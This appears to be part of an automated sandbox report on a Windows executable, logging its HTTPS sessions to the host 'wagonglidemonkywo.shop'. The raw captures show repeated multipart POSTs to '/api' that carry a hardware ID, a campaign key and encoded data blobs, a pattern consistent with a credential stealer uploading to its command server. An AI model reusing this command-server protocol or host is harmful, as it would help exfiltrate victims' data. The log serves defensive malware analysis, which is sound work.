                                            2024-03-29 07:10:53 UTC1369INData Raw: 36 68 79 51 43 57 57 53 6a 54 37 30 30 78 42 59 76 50 5a 6b 4e 6b 56 68 78 78 66 68 56 53 30 63 71 59 32 79 6b 66 37 37 44 33 70 2f 67 5a 30 34 52 4c 2b 59 4b 38 6e 43 4c 45 69 78 38 78 55 48 51 47 7a 75 71 6b 52 63 42 46 32 67 7a 4b 75 55 37 38 4d 33 4a 31 62 63 6b 41 44 51 6c 39 77 65 2f 47 65 78 54 59 54 2b 44 44 5a 4e 45 4f 36 71 52 46 77 45 58 61 44 4d 71 76 68 62 59 69 4a 50 58 72 53 51 43 57 57 53 68 43 76 4d 32 33 46 4e 6a 64 38 31 4c 30 6c 64 38 79 66 52 55 52 31 49 6e 64 57 69 68 66 37 58 4c 32 70 33 6a 61 55 6f 58 49 75 30 45 2b 58 71 48 45 69 55 39 6a 79 43 35 47 54 65 48 75 78 63 42 46 32 67 78 62 37 38 35 36 49 69 52 74 4f 4a 74 54 42 73 6c 38 41 71 2f 47 65 78 54 59 54 2b 44 44 5a 4e 45 4f 36 71 52 46 77 45 58 61 44 4d 71 76 68 62 59 69 4a
                                            Data Ascii: 6hyQCWWSjT700xBYvPZkNkVhxxfhVS0cqY2ykf77D3p/gZ04RL+YK8nCLEix8xUHQGzuqkRcBF2gzKuU78M3J1bckADQl9we/GexTYT+DDZNEO6qRFwEXaDMqvhbYiJPXrSQCWWShCvM23FNjd81L0ld8yfRUR1IndWihf7XL2p3jaUoXIu0E+XqHEiU9jyC5GTeHuxcBF2gxb7856IiRtOJtTBsl8Aq/GexTYT+DDZNEO6qRFwEXaDMqvhbYiJ
                                            2024-03-29 07:10:53 UTC1369INData Raw: 4c 33 4e 6b 6f 30 2b 39 4e 4d 59 49 54 42 57 44 44 5a 4d 5a 4e 34 65 37 46 77 4e 53 4a 6a 45 77 35 54 6d 38 77 39 65 54 36 6d 70 42 48 53 37 6b 42 66 74 33 67 68 63 67 63 73 56 4b 30 46 52 78 79 66 64 66 51 6c 51 6d 65 6d 65 73 66 50 43 45 76 76 32 74 4a 41 4a 5a 5a 4b 4e 50 76 54 61 44 43 57 4d 6c 67 77 2f 67 57 47 50 53 36 56 6b 44 4f 6b 49 7a 4b 75 55 37 38 6f 6a 4f 32 34 41 4f 41 6c 6c 6b 6f 30 2b 39 62 2b 74 35 59 54 2b 44 44 5a 4d 5a 4e 34 65 35 55 6b 38 56 63 6a 4d 6f 70 6d 75 36 77 4e 2b 51 34 47 4e 44 46 43 48 73 43 2f 4e 38 6a 52 6b 6c 63 73 68 64 30 6c 64 37 77 76 64 5a 54 56 67 67 63 6d 58 6e 4e 39 2b 69 6b 39 65 74 4a 41 4a 5a 5a 4b 4e 4e 2b 47 37 45 53 57 45 39 37 55 6a 63 64 58 37 4a 2f 68 55 73 50 57 67 7a 4b 75 55 37 38 74 57 66 2b 6f 63
                                            Data Ascii: L3Nko0+9NMYITBWDDZMZN4e7FwNSJjEw5Tm8w9eT6mpBHS7kBft3ghcgcsVK0FRxyfdfQlQmemesfPCEvv2tJAJZZKNPvTaDCWMlgw/gWGPS6VkDOkIzKuU78ojO24AOAllko0+9b+t5YT+DDZMZN4e5Uk8VcjMopmu6wN+Q4GNDFCHsC/N8jRklcshd0ld7wvdZTVggcmXnN9+ik9etJAJZZKNN+G7ESWE97UjcdX7J/hUsPWgzKuU78tWf+oc
                                            2024-03-29 07:10:53 UTC1369INData Raw: 59 6c 50 76 54 54 47 55 32 45 2f 67 77 2f 57 56 7a 57 64 75 78 56 48 58 79 70 38 59 71 78 32 73 38 33 66 6c 65 4a 73 55 68 4d 6d 34 51 50 35 64 34 67 55 49 6e 48 43 58 64 31 64 65 4d 50 78 52 77 4d 62 52 52 6b 71 35 54 76 79 69 4a 50 58 72 53 5a 48 41 32 61 35 54 37 39 57 6a 78 30 67 63 63 42 49 35 46 68 37 79 2f 35 44 41 7a 70 43 4d 79 72 6c 4f 2f 4b 49 7a 74 75 45 43 53 68 77 5a 4b 4d 55 6b 42 37 47 55 32 45 2f 67 77 32 54 47 54 58 43 39 52 55 62 46 32 70 38 5a 4b 31 30 74 63 37 5a 6b 75 78 6e 54 42 38 72 37 41 6e 32 63 6f 45 44 4d 58 76 50 54 39 35 56 65 73 6e 72 57 30 5a 56 4a 6a 45 6d 79 42 48 79 69 4a 50 58 72 53 51 43 57 57 62 6d 46 62 38 75 78 6c 45 53 61 73 45 50 76 6a 4d 33 68 37 73 58 41 52 63 31 50 77 50 49 45 64 2b 69 75 74 65 74 66 79 39 7a
                                            Data Ascii: YlPvTTGU2E/gw/WVzWduxVHXyp8Yqx2s83fleJsUhMm4QP5d4gUInHCXd1deMPxRwMbRRkq5TvyiJPXrSZHA2a5T79Wjx0gccBI5Fh7y/5DAzpCMyrlO/KIztuECShwZKMUkB7GU2E/gw2TGTXC9RUbF2p8ZK10tc7ZkuxnTB8r7An2coEDMXvPT95VesnrW0ZVJjEmyBHyiJPXrSQCWWbmFb8uxlESasEPvjM3h7sXARc1PwPIEd+iutetfy9z
                                            2024-03-29 07:10:53 UTC1369INData Raw: 38 75 78 6c 45 41 61 74 46 43 6b 54 51 64 68 37 73 58 41 52 64 6f 62 69 62 49 45 66 4b 49 6b 39 65 74 4a 46 6c 30 54 71 4e 50 76 54 54 47 55 32 45 2f 67 55 6a 64 47 79 32 48 75 56 31 4f 58 53 42 31 62 36 70 2b 74 73 50 44 6e 4f 70 6f 51 42 38 74 37 67 76 37 64 59 51 44 4a 58 6e 4a 54 4e 78 57 65 38 62 39 46 51 30 36 51 6a 4d 71 35 54 76 79 69 4a 50 58 72 32 46 59 57 33 36 6a 54 63 31 37 69 67 6f 73 65 74 42 46 6b 54 51 64 68 37 73 58 41 52 64 6f 62 69 62 49 45 66 4b 49 6b 39 65 74 4a 46 6c 30 54 71 4e 50 76 54 54 47 55 32 45 2f 67 55 6a 64 47 79 32 48 75 56 46 4e 52 79 46 77 59 36 78 33 74 38 58 55 6e 2b 39 70 52 42 67 6f 36 67 7a 38 66 6f 6b 63 4c 58 66 49 52 74 5a 58 63 63 4b 35 47 79 77 39 61 44 4d 71 35 54 76 79 69 4a 50 56 36 48 34 41 51 32 53 68 4a
                                            Data Ascii: 8uxlEAatFCkTQdh7sXARdobibIEfKIk9etJFl0TqNPvTTGU2E/gUjdGy2HuV1OXSB1b6p+tsPDnOpoQB8t7gv7dYQDJXnJTNxWe8b9FQ06QjMq5TvyiJPXr2FYW36jTc17igosetBFkTQdh7sXARdobibIEfKIk9etJFl0TqNPvTTGU2E/gUjdGy2HuVFNRyFwY6x3t8XUn+9pRBgo6gz8fokcLXfIRtZXccK5Gyw9aDMq5TvyiJPV6H4AQ2ShJ
                                            2024-03-29 07:10:53 UTC1369INData Raw: 62 4c 58 54 54 44 35 38 30 48 59 65 37 46 77 45 58 61 44 4d 71 35 33 36 6f 69 6f 6e 58 72 30 78 62 47 69 76 74 54 39 46 39 6b 68 5a 68 58 4d 39 45 31 6c 64 6a 68 5a 59 39 41 52 64 6f 4d 79 72 6c 5a 76 36 6c 75 64 65 74 4a 41 4a 5a 5a 50 68 69 6c 7a 54 47 55 32 45 2f 67 77 32 54 47 33 4c 4a 75 51 30 42 46 53 4e 2f 5a 4b 52 2b 75 4d 4c 55 6c 65 52 6d 54 78 45 6f 35 68 2f 31 65 6f 34 44 4c 48 37 4d 53 39 78 52 63 4d 7a 72 55 45 70 54 61 6a 38 48 7a 7a 76 79 69 4a 50 58 72 53 51 43 57 79 48 35 54 61 63 30 78 43 6b 6f 63 2f 4e 4d 79 68 73 61 72 62 73 58 41 52 64 6f 4d 33 66 70 46 74 69 49 6b 39 65 74 4a 41 49 43 53 59 6c 50 76 54 54 47 55 32 45 2f 67 77 2f 57 56 7a 57 64 75 78 56 41 55 69 6c 77 59 71 35 31 76 38 33 56 68 2b 56 68 55 68 6f 6e 36 67 44 7a 64 6f
                                            Data Ascii: bLXTTD580HYe7FwEXaDMq536oionXr0xbGivtT9F9khZhXM9E1ldjhZY9ARdoMyrlZv6ludetJAJZZPhilzTGU2E/gw2TG3LJuQ0BFSN/ZKR+uMLUleRmTxEo5h/1eo4DLH7MS9xRcMzrUEpTaj8HzzvyiJPXrSQCWyH5Tac0xCkoc/NMyhsarbsXARdoM3fpFtiIk9etJAICSYlPvTTGU2E/gw/WVzWduxVAUilwYq51v83Vh+VhUhon6gDzdo
                                            2024-03-29 07:10:53 UTC1369INData Raw: 67 57 7a 47 54 58 2f 65 75 54 6f 72 46 32 67 7a 4b 75 55 37 72 34 53 2b 2f 61 30 6b 41 6c 6c 6b 6f 78 53 51 48 73 5a 54 59 54 2b 44 44 5a 4d 5a 4e 63 4c 31 46 52 73 58 61 6e 78 76 71 58 47 32 78 4e 65 48 34 32 6c 47 47 79 66 72 41 50 4e 39 67 78 38 6f 65 38 52 43 30 56 31 7a 77 66 31 52 54 56 5a 71 50 77 66 50 4f 2f 4b 49 6b 39 65 74 4a 41 4a 62 49 66 6c 4e 70 7a 54 45 4e 67 35 4d 67 32 7a 47 54 58 2f 43 39 55 4e 49 56 43 6c 6e 5a 62 63 35 33 36 4b 54 31 36 30 6b 41 6c 6b 35 72 32 4b 58 4e 4d 5a 54 59 54 2b 44 56 72 34 7a 4e 34 65 37 46 77 45 58 61 44 4d 6f 6f 48 58 77 6b 70 50 56 35 47 68 46 47 69 72 72 43 76 46 6b 68 52 73 76 66 4d 5a 49 32 6b 6c 2b 31 2f 4a 64 51 46 73 69 65 47 69 70 65 62 48 48 30 64 57 68 43 53 68 5a 5a 4b 4e 50 76 54 54 47 55 32 4e
                                            Data Ascii: gWzGTX/euTorF2gzKuU7r4S+/a0kAllkoxSQHsZTYT+DDZMZNcL1FRsXanxvqXG2xNeH42lGGyfrAPN9gx8oe8RC0V1zwf1RTVZqPwfPO/KIk9etJAJbIflNpzTENg5Mg2zGTX/C9UNIVClnZbc536KT160kAlk5r2KXNMZTYT+DVr4zN4e7FwEXaDMooHXwkpPV5GhFGirrCvFkhRsvfMZI2kl+1/JdQFsieGipebHH0dWhCShZZKNPvTTGU2N


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.449732172.67.221.1284437556C:\Users\user\Desktop\20qMFnd9tO.exe
                                            TimestampBytes transferredDirectionData
                                            2024-03-29 07:10:53 UTC288OUTPOST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 18161
                                            Host: wagonglidemonkywo.shop
                                            2024-03-29 07:10:53 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 30 46 33 41 45 33 30 41 34 35 37 31 34 32 31 30 33 38 43 30 44 44 36 33 45 38 37 44 41 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"070F3AE30A4571421038C0DD63E87DA4--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                            2024-03-29 07:10:53 UTC2830OUTData Raw: 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f
                                            Data Ascii: 2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?
                                            2024-03-29 07:10:54 UTC806INHTTP/1.1 200 OK
                                            Date: Fri, 29 Mar 2024 07:10:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=ggqjrr4qfc5iksk5b0fctlpj99; expires=Tue, 23-Jul-2024 00:57:33 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KP8cm8v%2BOaSyPOEJmVgujLGVkShmnJQUj2U7TyomkIvroynQ%2FB4qvMvbtzKJ0dcA7mSn74nzFHiynfpqoVgPhYNugexrI8UGljknW1unjNxg%2FAiVJo0nF0LuCZXkv5nJ520%2BYnBm4aM6"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 86be0af1da452006-IAD
                                            alt-svc: h3=":443"; ma=86400
                                            2024-03-29 07:10:54 UTC22INData Raw: 31 30 0d 0a 6f 6b 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 0d 0a
                                            Data Ascii: 10ok 102.165.48.43
                                            2024-03-29 07:10:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.449733172.67.221.1284437556C:\Users\user\Desktop\20qMFnd9tO.exe
                                            TimestampBytes transferredDirectionData
                                            2024-03-29 07:10:54 UTC287OUTPOST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 8782
                                            Host: wagonglidemonkywo.shop
                                            2024-03-29 07:10:54 UTC8782OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 30 46 33 41 45 33 30 41 34 35 37 31 34 32 31 30 33 38 43 30 44 44 36 33 45 38 37 44 41 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"070F3AE30A4571421038C0DD63E87DA4--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                            2024-03-29 07:10:54 UTC806INHTTP/1.1 200 OK
                                            Date: Fri, 29 Mar 2024 07:10:54 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=4h7c199lbn7p2qv7ttp30ceg9r; expires=Tue, 23-Jul-2024 00:57:33 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CqYdC0mgoVlCD9gDdYZpxbZGTDwWEAqNtUx3PSWKrlXuN2y%2BzGgJtpj7TCYIjv9v6m%2F1W62A%2FgBtVTNGCadzCDKhf%2FJ7CVIUn33mr4TnqEnXfpgXMbKsiQMK7rN5U2PSFXR3Q0lmL1jw"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 86be0af6ebd52000-IAD
                                            alt-svc: h3=":443"; ma=86400
                                            2024-03-29 07:10:54 UTC22INData Raw: 31 30 0d 0a 6f 6b 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 0d 0a
                                            Data Ascii: 10ok 102.165.48.43
                                            2024-03-29 07:10:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.449734172.67.221.1284437556C:\Users\user\Desktop\20qMFnd9tO.exe
                                            TimestampBytes transferredDirectionData
                                            2024-03-29 07:10:55 UTC288OUTPOST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 20435
                                            Host: wagonglidemonkywo.shop
                                            2024-03-29 07:10:55 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 30 46 33 41 45 33 30 41 34 35 37 31 34 32 31 30 33 38 43 30 44 44 36 33 45 38 37 44 41 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"070F3AE30A4571421038C0DD63E87DA4--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                            2024-03-29 07:10:55 UTC5104OUTData Raw: 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00
                                            Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                            2024-03-29 07:10:55 UTC804INHTTP/1.1 200 OK
                                            Date: Fri, 29 Mar 2024 07:10:55 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=sovojt9nup7okh3e2gdj039g8l; expires=Tue, 23-Jul-2024 00:57:34 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aUNckGi5WwS7nxQCrQyUVFKKxbtTeD1UTpZ8jCeEE44ePJoVqwahRavPYxGelIEX%2FKs2gArhl8CnOOC4DIJo8OA7%2FfwYtGJ9rIWWZ19PhbeikJ%2BZkcHwLLPqHKK83YKu5w5avHmy2gJ2"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 86be0afc59432896-IAD
                                            alt-svc: h3=":443"; ma=86400
                                            2024-03-29 07:10:55 UTC22INData Raw: 31 30 0d 0a 6f 6b 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 0d 0a
                                            Data Ascii: 10ok 102.165.48.43
                                            2024-03-29 07:10:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.449735172.67.221.1284437556C:\Users\user\Desktop\20qMFnd9tO.exe
                                            TimestampBytes transferredDirectionData
                                            2024-03-29 07:10:56 UTC287OUTPOST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 7082
                                            Host: wagonglidemonkywo.shop
                                            2024-03-29 07:10:56 UTC7082OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 30 46 33 41 45 33 30 41 34 35 37 31 34 32 31 30 33 38 43 30 44 44 36 33 45 38 37 44 41 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"070F3AE30A4571421038C0DD63E87DA4--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                            2024-03-29 07:10:57 UTC804INHTTP/1.1 200 OK
                                            Date: Fri, 29 Mar 2024 07:10:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=2af1hgsfrpvia55p5mc974ou69; expires=Tue, 23-Jul-2024 00:57:36 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
                                            CF-Cache-Status: DYNAMIC
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1GOnm4qC0c%2BizXto04qfKwCKvK3N3QLShpXYAWPFi5L7E%2FHJJSQ9zyyegMM7K3F3ibXAe7ZNnPjAwaAzzWI4Uu3QqNyCfMg5aL2xV1soyJnT2n08QOVn%2FnTWA245LRInPJdsTXKS6o5w"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 86be0b04ff18205d-IAD
                                            alt-svc: h3=":443"; ma=86400
                                            2024-03-29 07:10:57 UTC22INData Raw: 31 30 0d 0a 6f 6b 20 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 0d 0a
                                            Data Ascii: 10ok 102.165.48.43
                                            2024-03-29 07:10:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.449736172.67.221.1284437556C:\Users\user\Desktop\20qMFnd9tO.exe
                                            TimestampBytes transferredDirectionData
                                            2024-03-29 07:10:57 UTC287OUTPOST /api HTTP/1.1
                                            Connection: Keep-Alive
                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                            Content-Length: 1410
                                            Host: wagonglidemonkywo.shop
                                            2024-03-29 07:10:57 UTC1410OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 30 46 33 41 45 33 30 41 34 35 37 31 34 32 31 30 33 38 43 30 44 44 36 33 45 38 37 44 41 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"070F3AE30A4571421038C0DD63E87DA4--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                            2024-03-29 07:10:57 UTC810INHTTP/1.1 200 OK
                                            Date: Fri, 29 Mar 2024 07:10:57 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Set-Cookie: PHPSESSID=q3r4u02megb1jksrhilspgstb0; expires=Tue, 23-Jul-2024 00:57:36 GMT; Max-Age=9999999; path=/
                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate
                                            Pragma: no-cache
